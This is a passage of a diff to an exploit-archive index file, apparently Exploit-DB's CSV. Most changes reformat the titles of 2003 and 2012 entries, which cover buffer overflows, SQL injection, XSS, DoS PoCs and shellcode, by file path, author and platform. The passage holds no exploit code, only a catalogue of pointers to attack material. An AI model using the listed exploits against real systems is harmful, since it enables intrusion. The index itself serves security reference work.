Vulnerability",2003-03-19,"Ertan Kurt",php,webapps,0 @@ -19617,13 +19617,13 @@ id,file,description,date,author,platform,type,port 22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 Info_Message Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 -22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 Multiple Chat Dialog Resource Consumption Vulnerability",2003-03-21,"Auriemma Luigi",windows,dos,0 +22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerability",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"Wordpress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 ""unserialize()"" PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 -22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 +22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 @@ -19637,8 +19637,8 @@ id,file,description,date,author,platform,type,port 22414,platforms/php/webapps/22414.php,"PHPNuke 5.6/6.x News Module Index.PHP SQL Injection Vulnerability",2003-03-23,frog,php,webapps,0 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service Vulnerability",2003-03-24,"Piotr Chytla",hardware,dos,0 22416,platforms/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability",2003-03-24,"Piotr Chytla",hardware,remote,0 -22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1)",2003-04-28,"Core Security",windows,dos,0 -22418,platforms/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2)",2003-04-30,ThreaT,windows,remote,0 +22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability (1)",2003-04-28,"Core Security",windows,dos,0 +22418,platforms/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability (2)",2003-04-30,ThreaT,windows,remote,0 22419,platforms/php/dos/22419.php,"PHP 4.3 socket_iovec_alloc() Integer Overflow Vulnerability",2003-03-25,"Sir Mordred",php,dos,0 22420,platforms/windows/dos/22420.txt,"Emule 0.27 b Empty Nickname Chat Request Denial of Service Vulnerability",2003-03-25,"Auriemma Luigi",windows,dos,0 22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 HTML Code Injection Vulnerability",2003-03-25,Over_G,php,webapps,0 @@ -19685,12 +19685,12 @@ id,file,description,date,author,platform,type,port 22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 -22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 +22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0 -22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0 -22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0 -22470,platforms/unix/remote/22470.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3)",2003-05-12,eDSee,unix,remote,0 -22471,platforms/unix/remote/22471.txt,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4)",2003-04-07,noir,unix,remote,0 +22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0 +22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0 +22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow Vulnerability (3)",2003-05-12,eDSee,unix,remote,0 +22471,platforms/unix/remote/22471.txt,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow Vulnerability (4)",2003-04-07,noir,unix,remote,0 22472,platforms/multiple/remote/22472.txt,"Vignette StoryServer 4.1 Sensitive Stack Memory Information Disclosure Vulnerability",2003-04-07,@stake,multiple,remote,0 22473,platforms/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 PHP Code Injection Vulnerability",2003-04-07,"Berend-Jan Wever",php,webapps,0 22474,platforms/php/webapps/22474.txt,"Py-Membres 4.0 - Remote SQL Injection Vulnerability",2003-04-07,frog,php,webapps,0 @@ -19709,7 +19709,7 @@ id,file,description,date,author,platform,type,port 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0 -22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0 +22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 - CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 @@ -19746,7 +19746,7 @@ id,file,description,date,author,platform,type,port 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow Vulnerability",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability",2003-04-09,ThreaT,windows,local,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum Login.ASP SQL Injection Vulnerability",2003-04-23,Du|L,asp,webapps,0 -22530,platforms/windows/remote/22530.pl,"Microsoft Internet Explorer 5 Remote URLMON.DLL Buffer Overflow Vulnerability",2003-04-23,"Jouko Pynnonen",windows,remote,0 +22530,platforms/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote URLMON.DLL Buffer Overflow Vulnerability",2003-04-23,"Jouko Pynnonen",windows,remote,0 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 SDBINST Race Condition Vulnerability",2003-04-23,"Larry W. Cashdollar",linux,local,0 22532,platforms/hardware/remote/22532.txt,"IKE Aggressive Mode Shared Secret Hash Leakage Weakness",1999-10-02,"John Pliam",hardware,remote,0 22533,platforms/hardware/remote/22533.txt,"Nokia IPSO 3.4.x Voyager ReadFile.TCL Remote File Reading Vulnerability",2003-04-24,"Jonas Eriksson",hardware,remote,0 @@ -19757,11 +19757,11 @@ id,file,description,date,author,platform,type,port 22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x Error Logging Buffer Overflow Vulnerability (2)",2003-04-24,jlanthea,linux,local,0 22539,platforms/php/webapps/22539.txt,"Xoops 1.3.x/2.0 MyTextSanitizer HTML Injection Vulnerability",2003-04-25,magistrat,php,webapps,0 22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 Command Line Argument Buffer Overflow Vulnerability",2003-02-18,"Angelo Rosiello",linux,local,0 -22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x Remote File Viewing Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 -22542,platforms/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 +22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 +22542,platforms/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 IMG Tag Script Injection Vulnerability",2003-04-25,"David F. Madrid",php,webapps,0 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 Error Message Path Disclosure Vulnerability",2003-04-26,"Network Intelligence",cfm,webapps,0 -22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 Remote Command Execution Vulnerability",2003-04-26,aresu@bosen.net,cgi,webapps,0 +22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution Vulnerability",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection Vulnerability",2003-04-28,nesumin,windows,remote,0 22547,platforms/php/webapps/22547.php,"Invision Power Board <= 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 @@ -19817,7 +19817,7 @@ id,file,description,date,author,platform,type,port 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 Private Message HTML Injection Vulnerability",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 Authentication Bypass Vulnerability",2003-05-14,cdowns,php,webapps,0 -22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x Cross-Site Scripting Vulnerability",2003-05-14,"Hugo Vazquez",linux,remote,0 +22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting Vulnerability",2003-05-14,"Hugo Vazquez",linux,remote,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 ICMP Flood Remote Denial of Service Vulnerability",2003-05-14,"Shaun Colley",palm_os,dos,0 22603,platforms/php/webapps/22603.txt,"PHP-Proxima autohtml.PHP Information Disclosure Vulnerability",2003-05-14,"Mind Warper",php,webapps,0 22604,platforms/windows/remote/22604.txt,"ArGoSoft 1.8.x Authentication Bypass Vulnerability",2003-05-15,"Ziv Kamir",windows,remote,0 @@ -19838,22 +19838,22 @@ id,file,description,date,author,platform,type,port 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x Cupsd Request Method Denial of Service Vulnerability",2003-05-20,"Phil D'Amore",linux,dos,0 22620,platforms/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x Unauthorized HTS Access Vulnerability",2003-05-20,mattmurphy,windows,remote,0 22621,platforms/windows/dos/22621.txt,"Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability",2003-05-20,"David F. Madrid",windows,dos,0 -22622,platforms/linux/remote/22622.txt,"WSMP3 0.0.x Remote Information Disclosure Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 -22623,platforms/linux/remote/22623.txt,"WSMP3 0.0.x Remote Command Execution Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 +22622,platforms/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 +22623,platforms/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 Reconnect Denial of Service Vulnerability",2003-05-21,"russian code molester",linux,dos,0 22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 login.PHP Authentication Bypass Vulnerability",2003-05-21,frog,php,webapps,0 22626,platforms/hardware/remote/22626.txt,"Axis Network Camera 2.x HTTP Authentication Bypass Vulnerability",2003-05-27,"Juliano Rizzo",hardware,remote,0 22627,platforms/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 File Attachment Spoofing Variant Vulnerability",2003-05-22,"Paul Szabo",windows,remote,0 22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability",2003-03-20,"Tomasz Grabowski",multiple,local,0 22629,platforms/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module Integer Overflow Vulnerability",2003-05-22,"Sir Mordred",osx,dos,0 -22630,platforms/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster 0 ID3 Tag Handling Vulnerability",2003-05-22,"Sir Mordred",osx,remote,0 +22630,platforms/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling Vulnerability",2003-05-22,"Sir Mordred",osx,remote,0 22631,platforms/windows/remote/22631.txt,"IISProtect 2.1/2.2 Authentication Bypass Vulnerability",2003-05-22,iDefense,windows,remote,0 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 Member.PHP Cross-Site Scripting Vulnerability",2003-06-22,"Marc Ruef",php,webapps,0 22633,platforms/linux/local/22633.c,"Polymorph 0.4 Filename Buffer Overflow Vulnerability",2003-05-22,demz,linux,local,0 22634,platforms/multiple/dos/22634.txt,"Nessus 2.0.x LibNASL Arbitrary Code Execution Vulnerability",2003-05-22,"Sir Mordred",multiple,dos,0 22635,platforms/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 Command Format String Vulnerability",2003-05-23,D4rkGr3y,windows,remote,0 22636,platforms/windows/remote/22636.txt,"EServ 2.9x Directory Indexing Vulnerability",2003-05-23,D4rkGr3y,windows,remote,0 -22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x Remote Denial of Service Vulnerability",2003-05-23,DHGROUP,windows,dos,0 +22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service Vulnerability",2003-05-23,DHGROUP,windows,dos,0 22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x MediaMail HOME Environment Variable Buffer Overflow Vulnerability",2003-05-23,bazarr@ziplip.com,irix,dos,0 22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability",2003-05-23,Gyrniff,asp,webapps,0 22640,platforms/linux/local/22640.c,"UML_NET Integer Mismanagement Code Execution Vulnerability",2003-05-23,ktha@hushmail.com,linux,local,0 @@ -19874,8 +19874,8 @@ id,file,description,date,author,platform,type,port 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay <= 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0 -22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (1)",2003-05-26,wsxz,linux,remote,0 -22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,remote,0 +22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (1)",2003-05-26,wsxz,linux,remote,0 +22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,remote,0 22660,platforms/php/webapps/22660.txt,"PostNuke Phoenix 0.72x Rating System Denial of Service Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability",2003-05-27,"Gino Thomas",freebsd,local,0 22662,platforms/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 HTML Attachment Cross Site Scripting Vulnerability",2003-05-27,KernelPanikLabs,multiple,remote,0 @@ -19902,11 +19902,11 @@ id,file,description,date,author,platform,type,port 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,metasploit,php,remote,0 -22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability",2003-05-29,pokleyzz,php,webapps,0 +22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service Vulnerability",2003-05-29,"Luca Ercoli",windows,dos,0 -22691,platforms/windows/remote/22691.txt,"pablo software solutions baby ftp server 1.2 - Directory Traversal vulnerability",2003-05-29,dr_insane,windows,remote,0 +22691,platforms/windows/remote/22691.txt,"pablo software solutions baby ftp server 1.2 - Directory Traversal Vulnerability",2003-05-29,dr_insane,windows,remote,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6,Formail-Clone E-Mail Restriction Bypass Vulnerability",2003-05-30,"Chad C. Keep",php,webapps,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 Resource Exhaustion Denial of Service Vulnerability",2003-05-30,"Luca Ercoli",windows,dos,0 @@ -19972,10 +19972,10 @@ id,file,description,date,author,platform,type,port 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 Installation Path Information Disclosure Weakness",2003-06-10,"Ziv Kamir",multiple,remote,0 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow Vulnerability",2003-06-01,watercloud,aix,local,0 22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3 .5 - Multiple GET Requests Denial of Service Vulnerability",2003-06-11,posidron,windows,dos,0 -22758,platforms/windows/remote/22758.txt,"silentthought simple web server 1.0 - Directory Traversal vulnerability",2003-06-12,"Ziv Kamir",windows,remote,0 +22758,platforms/windows/remote/22758.txt,"silentthought simple web server 1.0 - Directory Traversal Vulnerability",2003-06-12,"Ziv Kamir",windows,remote,0 22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial of Service Vulnerability",2003-06-12,"Ziv Kamir",windows,dos,0 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification Vulnerability",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 +22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager (view_faq.php, question param) SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.PHP UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0 @@ -19983,7 +19983,7 @@ id,file,description,date,author,platform,type,port 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure Vulnerability",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6,Xpdf 0.9x Hyperlinks Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 -22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 Remote Command Execution Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 +22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 Environment Variable Local Privilege Escalation Vulnerability",2003-06-14,kf,linux,local,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 Signal Handling Denial of Service Vulnerability",2003-06-14,LynX,windows,dos,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 JServer Logging Option Data Corruption Vulnerability",2003-06-14,"Stefano Di Paola",linux,local,0 @@ -19991,7 +19991,7 @@ id,file,description,date,author,platform,type,port 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script Code Injection Vulnerability",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4 .03 Search.ASP Cross-Site Scripting Vulnerability",2003-06-16,JeiAr,asp,webapps,0 22779,platforms/windows/local/22779.pl,"Mailtraq 2.1 .0.1302 User Password Encoding Weakness",2003-06-16,"Noam Rathaus",windows,local,0 -22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1 .0.1302 Remote Format String SMTP Resource Consumption Vulnerability",2003-06-16,"Noam Rathaus",windows,dos,0 +22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1 .0.1302 - Remote Format String SMTP Resource Consumption Vulnerability",2003-06-16,"Noam Rathaus",windows,dos,0 22781,platforms/linux/local/22781.txt,"Linux-PAM 0.77 Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability",2003-06-16,"Karol Wiesek",linux,local,0 22782,platforms/windows/remote/22782.py,"Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability",2003-07-02,"Core Security",windows,remote,0 22783,platforms/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 MSXML XML File Parsing Cross-Site Scripting Vulnerability",2003-06-17,"GreyMagic Software",windows,remote,0 @@ -20004,7 +20004,7 @@ id,file,description,date,author,platform,type,port 22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 CWD Command Denial of Service Vulnerability",2003-05-12,dr_insane,windows,dos,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 -22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 Remote Vulnerabilities",2003-06-17,dr_insane,php,webapps,0 +22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Remote Vulnerabilities",2003-06-17,dr_insane,php,webapps,0 22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server Long Get Request Remote Denial of Service Vulnerability",2003-06-17,dr_insane,windows,dos,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal Vulnerability",2003-06-18,dr_insane,windows,remote,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 Shared Memory Local Denial of Service Vulnerability",2003-06-18,"Frank DENIS",linux,dos,0 @@ -20020,7 +20020,7 @@ id,file,description,date,author,platform,type,port 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 Failure To Drop Privileges Local Privilege Escalation Vulnerability",2003-06-19,V9,linux,local,0 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2 .0.1 File Disclosure Vulnerability",2003-06-19,"thomas adams",windows,remote,0 22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x /lib/ Multiple Script Direct Request Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x Multiple Script sfx Parameter Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting Vulnerability",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow Vulnerability",2003-06-19,Matrix_DK,bsd,local,0 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 File Disclosure Vulnerability",2003-06-20,"Adam Stephens",php,webapps,0 @@ -20124,7 +20124,7 @@ id,file,description,date,author,platform,type,port 22911,platforms/php/local/22911.php,"PHP 4.3.x Undefined Safe_Mode_Include_Dir Safemode Bypass Vulnerability",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0 .0.9 uvadmsh Privilege Escalation Vulnerability",2003-07-16,kf,unix,local,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0 -22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0 .0.9 uvrestore Buffer Overflow vulnerability",2003-07-16,kf,unix,dos,0 +22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0 .0.9 uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities",2003-07-16,"Brett Moore",windows,remote,0 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0 .0.9 UVADMSH Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML Information Disclosure Vulnerability",2003-07-16,G00db0y,asp,webapps,0 @@ -20132,7 +20132,7 @@ id,file,description,date,author,platform,type,port 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Root Exploit (1)",2003-07-16,DVDMAN,unix,local,0 